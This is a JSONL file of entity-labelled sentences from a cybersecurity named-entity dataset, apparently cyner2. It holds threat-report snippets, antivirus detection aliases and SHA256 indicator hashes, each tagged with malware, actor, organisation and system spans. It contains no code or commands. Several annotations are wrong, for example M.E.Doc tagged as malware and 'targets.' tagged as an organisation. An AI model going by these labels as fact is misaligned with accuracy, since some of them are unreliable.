{"text": "A backdoor also known as: BKDR_KONUS.N Trojan.DownLoader24.32510 BKDR_KONUS.N BehavesLike.Win32.Trojan.fc Trojan.Razy.D27268 Trojan.Win32.Z.Razy.308742 Backdoor:Win32/Konus.A TScope.Malware-Cryptor.SB Trj/GdSda.A Win32/Trojan.797", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000114", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.91D0 RiskWare.GameHack Win32.Trojan.WisdomEyes.16070401.9500.9693 Trojan.Adylkuzz Win32.Application.PUPStudio.B Trojan.Win32.PUPStudio.expchr BehavesLike.Win32.Downloader.rc Trojan.Win32.VMProtect TR/AvKill.fkiqo Trojan:Win32/Avkill.E Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000115", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exp.OLE.CVE-2013-1331.A Exploit.OLE2.CVE-2013-1331.a!c Trojan.Mdropper Win32/Exploit.CVE-2013-1331.A TROJ_MDROPPR.ZMA Doc.Exploit.CVE_2013_1331-1 Exploit.OLE2.CVE-2013-1331.a Trojan.Dos.CVE-2013-1331.dftbiw DOC.S.CVE-2013-1331.115712 Win32.Exploit.Msoffice.Auto Exploit:W32/CVE-2013-1331.A TROJ_MDROPPR.ZMA EXP/CVE-2013-1331.A Exploit.OLE2.CVE-2013-1331.a Exploit.OLE2 MSWord/ScriptBridge.NT!exploit.CVE20131331 Win32/Trojan.Exploit.124", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000116", "source": "cyner2_train"}}
{"text": "By utilizing stolen credentials, the actor was able to manipulate the update server for M.E.Doc to proxy connections to an actor-controlled server.", "spans": {"THREAT_ACTOR: actor": [[37, 42]], "SYSTEM: server": [[77, 83]], "MALWARE: M.E.Doc": [[88, 95]]}, "info": {"id": "cyner2_train_000119", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.BrontokTiwiHV.Worm Worm/W32.Brontok.87061 Email-Worm.Win32.Brontok!O Worm.Rahiwi.A3 W32/Brontok.am Trojan.Heur.fmMfr5EYVjjib Win32.Trojan.VB.bb W32.Rahiwi.A Win32/Tnega.OPKOELC WORM_BRONTOK.SMB Email-Worm.Win32.Brontok.am Trojan.Win32.Brontok.dmfkjc I-Worm.Win32.A.Brontok.58368[UPX] Worm.Brontok.Win32.1133 WORM_BRONTOK.SMB BehavesLike.Win32.YahLover.mt Email-Worm.Win32.Brontok Worm.Brontok.bt W32.Worm.Rahiwi WORM/Brontok.AM.15 Worm[Email]/Win32.Brontok W32.W.Brontok.mjGp Email-Worm.Win32.Brontok.am Worm:Win32/Rahiwi.A Worm/Win32.Brontok.C47526 Worm.Brontok I-Worm.VB.ET Worm.Win32.Brontok.aab I-Worm.Brontok!pJaU4TE3gZk W32/AutoRun.RPV!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000120", "source": "cyner2_train"}}
{"text": "Traditionally, the group attacked organizations in the US as well as other targets.", "spans": {"THREAT_ACTOR: group": [[19, 24]], "ORGANIZATION: organizations": [[34, 47]], "ORGANIZATION: targets.": [[75, 83]]}, "info": {"id": "cyner2_train_000121", "source": "cyner2_train"}}
{"text": "Last month at the CERT-EU Conference in Brussels, Belgium, Volexity gave a presentation on a recent evolution in how attackers are maintaining persistence within victim networks.", "spans": {"ORGANIZATION: CERT-EU Conference": [[18, 36]], "ORGANIZATION: Volexity": [[59, 67]], "THREAT_ACTOR: attackers": [[117, 126]], "SYSTEM: victim networks.": [[162, 178]]}, "info": {"id": "cyner2_train_000122", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojandownloader.Tedekeh BehavesLike.Win32.AdwareDealPly.tc TrojanDownloader:Win32/Tedekeh.A PUP.Optional.BundleInstaller Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000123", "source": "cyner2_train"}}
{"text": "MalwareBytes recently encountered an atypical case of Sundown EK in the wild – usually the landing page is obfuscated, but in this case there was plain JavaScript.", "spans": {"ORGANIZATION: MalwareBytes": [[0, 12]], "MALWARE: Sundown EK": [[54, 64]]}, "info": {"id": "cyner2_train_000124", "source": "cyner2_train"}}
{"text": "We have observed this group targeting defense, aerospace, and legal sector companies.", "spans": {"THREAT_ACTOR: group": [[22, 27]], "ORGANIZATION: defense, aerospace,": [[38, 57]], "ORGANIZATION: legal sector companies.": [[62, 85]]}, "info": {"id": "cyner2_train_000128", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Small.32256.ACD Trojan/PSW.Ruftar.pmc BAT/LockScreen.EB Virus.BAT.Disabler", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000130", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PasswordStealer Trojan.Zusy.D40C66 Win32.Trojan.WisdomEyes.16070401.9500.9505 Trojan.Win32.Steam.exnrza Trojan.Win32.Z.Zusy.517120.A W32.W.AutoRun.lmJt Trojan.PWS.Steam.14964 BehavesLike.Win32.Dropper.hh Trojan.Win32.PSW W32/Trojan.OYNU-3017 PWS:Win32/PWSteal.R!bit Trj/CI.A W32/Delf.ORF!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000131", "source": "cyner2_train"}}
{"text": "In recent weeks we've discovered that the group have been actively updating their Clayslide delivery documents, as well as the Helminth backdoor used against victims.", "spans": {"THREAT_ACTOR: group": [[42, 47]], "MALWARE: Helminth backdoor": [[127, 144]], "ORGANIZATION: victims.": [[158, 166]]}, "info": {"id": "cyner2_train_000132", "source": "cyner2_train"}}
{"text": "These attacks involved ITG03 actors inserting malware between an ATM and its home bank network, and likely required advanced knowledge of the ATM's network path or prior access to a bank's network.", "spans": {"THREAT_ACTOR: ITG03 actors": [[23, 35]], "MALWARE: malware": [[46, 53]], "SYSTEM: ATM": [[65, 68]], "SYSTEM: home bank network,": [[77, 95]], "SYSTEM: ATM's network": [[142, 155]], "SYSTEM: bank's network.": [[182, 197]]}, "info": {"id": "cyner2_train_000133", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.Sileco.IM3 Worm.Palevo.Win32.123726 Trojan/Downloader.Small.aolo Win32.Trojan.Shellcode2EXE.a P2P-Worm.Win32.Palevo.fiqf Trojan.Win32.Palevo.etybtm TrojWare.Win32.TrojanDownloader.Small.aolo0 Trojan:W32/Shell2Exe.A Win32/PatchFile.gk Worm[P2P]/Win32.Palevo TrojanDownloader:Win32/Sileco.A P2P-Worm.Win32.Palevo.fiqf Downloader/Win32.Small.R3049 Worm.Palevo Trojan.Silvana Win32.Trojan.Manualpatched.Dkq Trojan-Downloader.Win32.Sileco Trj/CI.A Win32/Worm.P2P-Worm.fb5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000134", "source": "cyner2_train"}}
{"text": "The actors typically steal from financial institutions using targeted malware.", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "ORGANIZATION: financial institutions": [[32, 54]], "MALWARE: malware.": [[70, 78]]}, "info": {"id": "cyner2_train_000135", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Nubuler.D Downloader.Small.Win32.102411 Win32.Trojan-Downloader.Small.cj TROJ_NEBULER.SMF Trojan.MulDrop.origin TROJ_NEBULER.SMF BehavesLike.Win32.PWSOnlineGames.kc BDS/WinO.A Trojan:Win32/Nebuler.D Trojan.Nebuler.1 Trojan/Win32.CSon.R566 Nebuler.b Trojan.Win32.Nebuler", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000136", "source": "cyner2_train"}}
{"text": "How does Chrysaor work ? To install Chrysaor , we believe an attacker coaxed specifically targeted individuals to download the malicious software onto their device .", "spans": {"MALWARE: Chrysaor": [[9, 17], [36, 44]]}, "info": {"id": "cyner2_train_000137", "source": "cyner2_train"}}
{"text": "This is due to the fact that the exploit has been integrated into several exploit kits and many end users have not yet patched their machines.", "spans": {}, "info": {"id": "cyner2_train_000138", "source": "cyner2_train"}}
{"text": "This research note outlines what we know about the use of Hacking Team's Remote Control System RCS by South Korea's National Intelligence Service NIS.", "spans": {"ORGANIZATION: Hacking Team's": [[58, 72]], "SYSTEM: Remote Control System RCS": [[73, 98]], "ORGANIZATION: South Korea's National Intelligence Service NIS.": [[102, 150]]}, "info": {"id": "cyner2_train_000139", "source": "cyner2_train"}}
{"text": "The goal of this paper is to provide some updates to our previous FTA on AlienSpy, the predecessor of JSocket, and to discuss its Android capabilities in detail.", "spans": {"MALWARE: AlienSpy,": [[73, 82]], "MALWARE: JSocket,": [[102, 110]], "SYSTEM: Android": [[130, 137]]}, "info": {"id": "cyner2_train_000140", "source": "cyner2_train"}}
{"text": "The first malware program belonging to this family was spotted in May 2016 and was dubbed Linux.DDoS.87.", "spans": {"MALWARE: malware program": [[10, 25]], "MALWARE: family": [[44, 50]]}, "info": {"id": "cyner2_train_000141", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Vbiframe Trojan/Refroso.cwic Trojan.Strictor.D1D61 TROJ_CLICKER.CAQ Win32.Trojan.WisdomEyes.16070401.9500.9939 TROJ_CLICKER.CAQ Win.Trojan.Clicker-3888 Trojan-Clicker.Win32.VBiframe.fgl Virus.Win32.Sality.bgiylc Trojan.Win32.A.Refroso.110901 Troj.Clicker.W32.Vbiframe!c TrojWare.Win32.Downloader.VBIFrame.IK Trojan.Click.25308 Trojan.VBiframe.Win32.382 BehavesLike.Win32.BadFile.cc Trojan-Clicker.Win32.VBiframe TrojanClicker.VBiframe.vg Trojan/Win32.Refroso Trojan:Win32/Punad.G Trojan-Clicker.Win32.VBiframe.fgl Trojan/Win32.Clicker.R3068 SScope.Trojan.VBRA.3659 Trj/Clicker.ARC Trojan.DL.Pacoheir!0uqYAwP2RQg Win32/Trojan.Clicker.bd6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000142", "source": "cyner2_train"}}
{"text": "This powerful corporate espionage threat is specifically designed to target large enterprises in the technology, pharma, commodities and legal sectors, penetrating their security and exfiltrating commercially sensitive information.", "spans": {"THREAT_ACTOR: corporate espionage threat": [[14, 40]], "ORGANIZATION: large enterprises": [[76, 93]], "ORGANIZATION: technology, pharma, commodities": [[101, 132]], "ORGANIZATION: legal sectors,": [[137, 151]]}, "info": {"id": "cyner2_train_000143", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.ConfickerIOC.Worm Win32.Worm.Conficker.A Worm/W32.Kido.12304 Net-Worm.Win32.Kido!O Worm.Kido.11922 Trojan/Conficker.dam Win32.Worm.Conficker.m W32/Conficker.G W32.Downadup Win32/Conficker.B Win.Trojan.Rootkit-58 Win32.Worm.Conficker.A Net-Worm.Win32.Kido.jq Win32.Worm.Conficker.A Trojan.Win32.Kido.ghbd Worm.Win32.Conficker.4096 Win32.Worm.Conficker.A Trojan:W32/Downadup.AL Win32.HLLW.Autoruner.5555 Worm.Conficker.Win32.405 Net-Worm.Win32.Kido W32/Conficker.UCIE-3981 Worm/Kido.hw Worm[Net]/Win32.Kido Win32.Worm.Conficker.A Net-Worm.Win32.Kido.jq Trojan:WinNT/Conficker.B Win32/Conficker.worm.4096 Win32.Worm.Conficker.A Net-Worm.Kido Rootkit/Conficker.C Win32/Conficker.AA Trojan.Win32.Conficker.dd Worm.Conficker!L/CdK4RT60g Win32/RootKit.Conficker.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000144", "source": "cyner2_train"}}
{"text": "Over the past seven months, Unit 42 has been investigating a series of attacks we attribute to a group we have code named Scarlet Mimic. The attacks began over four years ago and their targeting pattern suggests that this adversary's primary mission is to gather information about minority rights activists.", "spans": {"ORGANIZATION: Unit 42": [[28, 35]], "THREAT_ACTOR: group": [[97, 102]], "THREAT_ACTOR: Scarlet Mimic.": [[122, 136]], "THREAT_ACTOR: adversary's primary mission": [[222, 249]]}, "info": {"id": "cyner2_train_000148", "source": "cyner2_train"}}
{"text": "Recently McAfee labs came across a point-of-sale POS malware that spreads through malicious macros inside a doc file.", "spans": {"ORGANIZATION: McAfee labs": [[9, 20]], "MALWARE: point-of-sale POS malware": [[35, 60]]}, "info": {"id": "cyner2_train_000149", "source": "cyner2_train"}}
{"text": "In October 2014, Kaspersky Lab started to research Blue Termite an Advanced Persistent Threat APT targeting Japan.", "spans": {"ORGANIZATION: Kaspersky Lab": [[17, 30]], "THREAT_ACTOR: Blue Termite": [[51, 63]], "THREAT_ACTOR: Advanced Persistent Threat APT": [[67, 97]]}, "info": {"id": "cyner2_train_000150", "source": "cyner2_train"}}
{"text": "Just in May, we pointed out how it had gone through six separate versions with various differences in its routines.", "spans": {}, "info": {"id": "cyner2_train_000151", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Spy.Bancos.if Trojan.Heur.EED312 TROJ_BANKER.BTB Win32.Trojan.Bancos.a Infostealer.Bancos TROJ_BANKER.BTB Win.Trojan.Bancos-122 Trojan-Banker.Win32.Bancos.if Trojan.Win32.Bancos.gaxc Troj.Banker.W32.Bancos.if!c TrojWare.Win32.Spy.Bancos.U Trojan.Bancos.Win32.1340 Trojan:Win32/Vlight.A TR/Spy.Bancos.IF Trojan[Banker]/Win32.Bancos Win32.Troj.Bancos.if.kcloud Trojan:Win32/Vlight.A Trojan-Banker.Win32.Bancos.if Win32.Trojan-banker.Bancos.Eehf Trojan.PWS.Bancos.OGQ Trojan-Banker.Win32.Bancos W32/Bancos.NJN!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000152", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.AP3 TROJ_VBNA.SMD Win32.Trojan.Paskod.a TROJ_VBNA.SMD Trojan.Win32.Dynamer.lpd Trojan.Win32.Dynamer.exrxxx Trojan.Win32.Z.Paskod.114692.A Troj.W32.Dynamer.mqvJ TrojWare.Win32.Paskod.D Trojan.DownLoader11.38900 Trojan.Dynamer.Win32.5199 Trojan.Win32.Paskod Trojan/Dynamer.cli TrojanDownloader:Win32/Tinub.A Trojan.Heur.VB.E4CDDB Trojan.Win32.Dynamer.lpd Trojan/Win32.VBCrypt.R122576 BScope.Trojan.Diple Trj/GdSda.A Win32.Trojan.Dynamer.Tcbz W32/Paskod.E!tr Win32/Trojan.ff1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000154", "source": "cyner2_train"}}
{"text": "One malware family seen in such attacks is known as SamSa', Samas', samsam', or most recently, MOKOPONI'.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: SamSa', Samas', samsam',": [[52, 76]], "MALWARE: MOKOPONI'.": [[95, 105]]}, "info": {"id": "cyner2_train_000156", "source": "cyner2_train"}}
{"text": "It seems to be part of a larger campaign, known as Pawn Storm", "spans": {"THREAT_ACTOR: campaign,": [[32, 41]], "THREAT_ACTOR: Pawn Storm": [[51, 61]]}, "info": {"id": "cyner2_train_000157", "source": "cyner2_train"}}
{"text": "Windows malware, also detected as: Trojan.Autoit, Trojan.Symmi.D10095, Trojan.Win32.Autoit.exnvng, Trojan.Win32.Z.Autoit.1079042, Troj.W32.Autoit!c, Trojan.Inject1.38999, Trojan.AutoIt.Win32.7, BehavesLike.Win32.Trojan.th, Trojan.Win32.Eupuds, Trojan.Autoit.ixi, Trojan:Win32/BrobanEup.A, Trojan.Autoit.Banker, Win32.Trojan.Autoit.Szbl, W32/Autoit.AAV!tr, Win32/Trojan.839,", "spans": {"MALWARE: Windows malware,": [[0, 16]]}, "info": {"id": "cyner2_train_000158", "source": "cyner2_train"}}
{"text": "The campaign has many stages of the infection chain and all needed to be unraveled before the final payload level was reached.", "spans": {}, "info": {"id": "cyner2_train_000159", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.InterneC.Worm Trojan.Downloader.VB.VRF Trojan-PWS/W32.WebGame.24576.IS Trojan.VB.Win32.91134 Troj.GameThief.W32.OnLineGames.tqmr!c Trojan/VB.nti TROJ_DLOAD.FH W32/Worm.AUBX TROJ_DLOAD.FH Win.Spyware.56255-2 Trojan.Downloader.VB.VRF Trojan.Downloader.VB.VRF Trojan.Win32.OnLineGames.tibz Trojan.Win32.PSWIGames.24576.GZ Trojan.Downloader.VB.VRF Trojan.Downloader.VB.VRF Trojan.DownLoader.55879 BehavesLike.Win32.Trojan.mz W32/Worm.EUBY-4599 Trojan/PSW.OnLineGames.asrj TR/PSW.OnlineGames.tqmr Trojan[GameThief]/Win32.OnLineGames Trojan.Downloader.VB.VRF Trojan/Win32.OnlineGameHack.C140754 Trojan.Downloader.VB.VRF TrojanPSW.OnLineGames.a Win32.Trojan-GameThief.Onlinegames.inv Trojan.Mansund!mgpvcbFSAhU Trojan-GameThief.Win32.OnLineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000160", "source": "cyner2_train"}}
{"text": "Indicators of Compromise ( IoCs ) SHA256 Detection e394e53e53cd9047d6cff184ac333ef7698a34b777ae3aac82c2c669ef661dfe AndroidOS_SpyAgent.HRXB e8d4713e43241ab09d40c2ae8814302f77de76650ccf3e7db83b3ac8ad41f9fa AndroidOS_ProjectSpy.HRX 29b0d86ae68d83f9578c3f36041df943195bc55a7f3f1d45a9c23f145d75af9d AndroidOS_ProjectSpy.HRX 3a15e7b8f4e35e006329811a6a2bf291d449884a120332f24c7e3ca58d0fbbdb IOS_ProjectSpy.A URLs cashnow [ .", "spans": {}, "info": {"id": "cyner2_train_000161", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader Win32/Tnega.CfCAeIB Win.Trojan.Downloader-64707 Application.Win32.Kuaiba.BC Trojan.DownLoader10.13268 BehavesLike.Win32.Downloader.tc Win32.Trojan-Downloader.GMUnpackerInstaller.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000164", "source": "cyner2_train"}}
{"text": "Though there were multiple waves of messages following a similar tactic, each one carried the same malicious .doc file as an attachment SHA256: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e.", "spans": {}, "info": {"id": "cyner2_train_000165", "source": "cyner2_train"}}
{"text": "The actor has used several notable techniques in these incidents such as sniffing passwords from Wi-Fi traffic, poisoning the NetBIOS Name Service, and spreading laterally via the EternalBlue exploit.", "spans": {"THREAT_ACTOR: The actor": [[0, 9]], "MALWARE: the EternalBlue exploit.": [[176, 200]]}, "info": {"id": "cyner2_train_000167", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Troj.Undef.kcloud Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000168", "source": "cyner2_train"}}
{"text": "During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload.", "spans": {"MALWARE: Komplex": [[40, 47], [203, 210]], "THREAT_ACTOR: attack campaign": [[71, 86]], "ORGANIZATION: individuals": [[97, 108]], "SYSTEM: OS X": [[117, 121]], "VULNERABILITY: exploited a vulnerability": [[127, 152]], "VULNERABILITY: MacKeeper antivirus application": [[160, 191]], "MALWARE: payload.": [[216, 224]]}, "info": {"id": "cyner2_train_000169", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W64/Risk.SHRD-0827 Riskware.Win64.Pwdump.bjsgmx Tool.Pwdump.80 W64/MalwareF.NVZY SPR/Tool.174080.1 Trojan[PSWTool]/Win32.CacheDump PUP.Optional.PasswordDump Trj/CI.A Riskware.Pwdump! not-a-virus:PSWTool.Win32.PWDump", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000170", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_DROPER.SMIA Win32.Trojan-Dropper.Delf.ay W32/Backdoor.WJXY-0415 Win32/Tnega.IX TROJ_DROPER.SMIA Trojan.Win32.Delf.cvuwsq Backdoor.Win32.ProRat.~O Trojan.Inject.5089 W32/Backdoor2.DVXL TrojanDropper:Win32/Amighelo.A Trojan.Heur.ED7518 Trojan.Win32.PSWIGames.1110528 Trojan.Amighelo Win32/TrojanDropper.Delf.NOD Trojan-Dropper.Win32.OnLineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000171", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9770 Trojan.FakeAV.13061 Worm:Win32/Gnoewin.A W32.W.Otwycal.l4av Win32/RiskWare.PEMalform.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000173", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.BitMiner Trojan.Zusy.D41F53 Tool.BtcMine.1195 Backdoor.PePatch.Win32.108542 BehavesLike.Win32.Backdoor.th PUA.CoinMiner RiskTool.BitMiner.au RiskWare[RiskTool]/Win32.BitCoinMiner Trojan:Win32/Optiminz.A Unwanted/Win32.BitCoinMiner.R215923 Trj/CI.A Win32/Virus.RiskTool.435", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000174", "source": "cyner2_train"}}
{"text": "The malware checks for sinkholing of its control servers before each network communication session and does not initiate its malicious activities—such as downloading and running the malicious payloads—if it thinks the Domain Name Service DNS records have been sinkholed.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: malicious": [[125, 134]], "MALWARE: malicious payloads—if": [[182, 203]], "SYSTEM: Domain Name Service DNS": [[218, 241]]}, "info": {"id": "cyner2_train_000176", "source": "cyner2_train"}}
{"text": "However, the recent activity caught our attention due to a change to the URL structure of the landing pages.", "spans": {}, "info": {"id": "cyner2_train_000177", "source": "cyner2_train"}}
{"text": "When running, the Kronos payload will download several other pieces of malware, but the one that caught our eye is a new credit card dumper with very low detection.", "spans": {"MALWARE: Kronos payload": [[18, 32]], "MALWARE: malware,": [[71, 79]], "MALWARE: credit card dumper": [[121, 139]]}, "info": {"id": "cyner2_train_000180", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ursnif.100315 Trojan.Filecoder.Win32.1880 Uds.Dangerousobject.Multi!c TROJ_HPROVNIX.SM Win32.Trojan.WisdomEyes.16070401.9500.9985 Ransom.Cryptolocker TROJ_HPROVNIX.SM Trojan-Ransom.Win32.Snocry.dmd Trojan.Win32.Encoder.eaaxms Trojan.Win32.Z.Razy.262660 Trojan.Encoder.3689 BehavesLike.Win32.VirRansom.dh W32/Trojan.RVGU-3177 Trojan.Cryptolocker.c TR/WinPlock.262656 Trojan[Ransom]/Win32.Cryptolocker Ransom:Win32/WinPlock.A Trojan.Razy.D2A0E Trojan-Ransom.Win32.Snocry.dmd Trojan/Win32.CryptoWall.R173903 Trojan.Ransom.cryptolocker Ransom.FileCryptor Trj/GdSda.A Win32/Filecoder.NFJ Win32.Trojan.Filecoder.Wncw Trojan.Cryptolocker! Trojan.Win32.Filecoder W32/HPROVNIX.SM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000181", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9960 Virus.Win32.Virut W32.Dropper.Dunik", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000182", "source": "cyner2_train"}}
{"text": "However, the malware is flexible enough to grant access to all the resources in the victim's computer.", "spans": {"MALWARE: malware": [[13, 20]], "SYSTEM: victim's computer.": [[84, 102]]}, "info": {"id": "cyner2_train_000183", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Hexzone.352256 Trojan-Ransom.Win32.Hexzone.1!O Trojan.Hexzone Win32.Trojan.WisdomEyes.16070401.9500.9952 Trojan.Hexzone Ransom_Hexzone.R002C0DAD18 Trojan.Win32.Hexzone.ewziqv Trojan.Win32.Hexzone.352256 Troj.Ransom.W32.Hexzone!c TrojWare.Win32.Ransom.Hexzone.~jap3 Trojan.Blackmailer.454 Ransom_Hexzone.R002C0DAD18 Trojan-Ransom.Win32.Hexzone Trojan.Hexzone.q Trojan[Ransom]/Win32.Hexzone Adware.Heur.E6B8C4 Adware.Vundo/Variant-LIB Trojan:Win32/Hexzone.A!dll Trojan/Win32.Hexzone.R6919 Win32/Hexzone.I Trojan.Hexzone!FZcXjlI3fIw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000184", "source": "cyner2_train"}}
{"text": "Further investigation of GhostPush revealed more recent variants, which, unlike older ones, employ the following routines that make them harder to remove and detect:", "spans": {"MALWARE: GhostPush": [[25, 34]], "MALWARE: variants,": [[56, 65]]}, "info": {"id": "cyner2_train_000185", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Downloader.Intexp.c Win32.Trojan.WisdomEyes.16070401.9500.9782 W32/Downloader.AJWJ Adware.IEPlugin Win.Downloader.64050-1 Trojan-Downloader.Win32.Intexp.c Trojan.Win32.Intexp.didb Trojan.Win32.Downloader.33280.AKE Troj.Downloader.W32.Intexp.c!c Win32.Trojan-downloader.Intexp.Alsx TrojWare.Win32.TrojanDownloader.Intexp.C Trojan.DownLoader.2369 Downloader.Intexp.Win32.13 BehavesLike.Win32.Koobface.nc Trojan-Downloader.Win32.OneClickNetSearch W32/Downloader.XUJA-4048 TrojanDownloader.Intexp.c W32.Malware.Downloader TR/Dldr.Intexp.B Trojan[Downloader]/Win32.Intexp Win32.TrojDownloader.Intexp.c.kcloud Trojan.Graftor.Elzob.DF6F Trojan-Downloader.Win32.Intexp.c TrojanDownloader:Win32/Intexp.C Trojan/Win32.HDC.C83257 TrojanDownloader.Intexp Win32/TrojanDownloader.Intexp.C Trojan.DL.Intexp!uQMofoaT248 W32/Malware_fam.NB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000187", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Multi Trojan.Win32.VB.dmoq Trojan.Win32.VB.ewrjie Trojan.Win32.Z.Camec.51712 Uds.Dangerousobject.Multi!c Win32.Trojan.Vb.Llgx BehavesLike.Win32.Trojan.qc Trojan/Win32.VB Trojan.Win32.VB.dmoq Trojan:Win32/Camec.B Trj/GdSda.A Trojan.Win32.Camec Win32/Trojan.7b5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000190", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Delf.Win32.27191 Trojan/Delf.ahzk Trojan.Zusy.D3A909 Win32.Backdoor.Lukicsel.c Win32/Bifrose.AAB Win.Spyware.80655-2 W32.Lamer.lwJ1 TrojWare.Win32.Trojan.Lukicsel.~Q Trojan.MulDrop1.48720 BehavesLike.Win32.Eggnog.fc Trojan/Delf.qyz Trojan/Win32.Delf TrojanDropper:Win32/Lukicsel.B Trojan.Win32.Delf.364544.B Trojan.Delf Win32/Lukicsel.Q W32/Crypt.NTAB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000191", "source": "cyner2_train"}}
{"text": "The use of adult-themed content echoes the one-click billing fraud app we've covered a few years back.", "spans": {}, "info": {"id": "cyner2_train_000193", "source": "cyner2_train"}}
{"text": "SHA256 Package Name App Name a6c7351b09a733a1b3ff8a0901c5bde fdc3b566bfcedcdf5a338c3a97c9f249b com.android.henbox 备份 ( Backup ) Table 3 HenBox variant used in description Once this variant of HenBox is installed on the victim ’ s device , the app can be executed in two different ways : One method for executing HenBox is for the victim to launch the malicious app ( named “ Backup ” , in this instance ) from the launcher view on their device , as shown in Figure 3 below .", "spans": {"MALWARE: HenBox": [[136, 142], [192, 198], [312, 318]]}, "info": {"id": "cyner2_train_000195", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.MSIL Backdoor.Telebot BKDR_TELEBOT.VBV Win.Trojan.Nyetya-6332125-0 Backdoor.Msil.Teledoor!c Win32.Trojan.Telebot.Acxl BackDoor.Medoc.2 Trojan.TeleDoor.Win32.2 BKDR_TELEBOT.VBV Backdoor.Teledoor W32/Trojan.RZZO-3107 Backdoor.MSIL.ojt W32.Backdoor.Medoc TR/TeleDoor.ME.1 Trojan[Backdoor]/MSIL.TeleDoor Trojan/Win32.TeleDoor.C2029730 Backdoor.MSIL.Telebot Bck/Teledoors.A Trojan.TeleDoor!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000196", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.BitMin.Win32.519 Trojan.Strictor.D1BA5D Trojan.Script.AutoIt.emewzp Trojan.BtcMine.1084 BehavesLike.Win32.BadFile.wc TR/BitCoinMiner.zzzlc Trojan/Win32.BitMin.C1728272 Trojan.Win32.Autoit Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000197", "source": "cyner2_train"}}
